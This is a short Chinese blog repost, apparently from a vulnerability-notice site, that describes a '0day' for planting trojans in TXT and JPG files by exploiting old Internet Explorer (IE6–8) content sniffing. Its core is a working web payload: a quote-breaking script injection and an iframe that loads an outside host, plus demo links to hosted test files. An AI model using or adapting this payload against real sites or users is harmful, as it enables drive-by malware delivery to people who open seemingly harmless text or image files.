【白银时代】备注:我孤陋寡闻了,都出了快半个月了……

该文章出自《Peerless (皮尔利斯)》,原文链接:http://www.xumus.com/read.php/80.htm
 

TXT文件和图片文件挂马0DAY
TXT挂马

TXT文件中插入一段JAVA代码后后边的HTML代码就会被IE执行

受影响版本IE6 7 8

代码:

 

‘><script>alert(sb)</script>
<iframe src=http://snight.org width=500 height=500></iframe>


演示:

演示:

引用:
http://snight.org/test.txt


图片挂马

将上述代码保存为JPG文件,然后通过IE访问,IE还是同样会解析图片中的HTML代码

受影响版本

IE6 7

演示:引用:
http://snight.org/0.jpg

 

本文来源于:漏洞公告。转载请保留这个链接,不会对你的SEO大业产生影响。

留下回复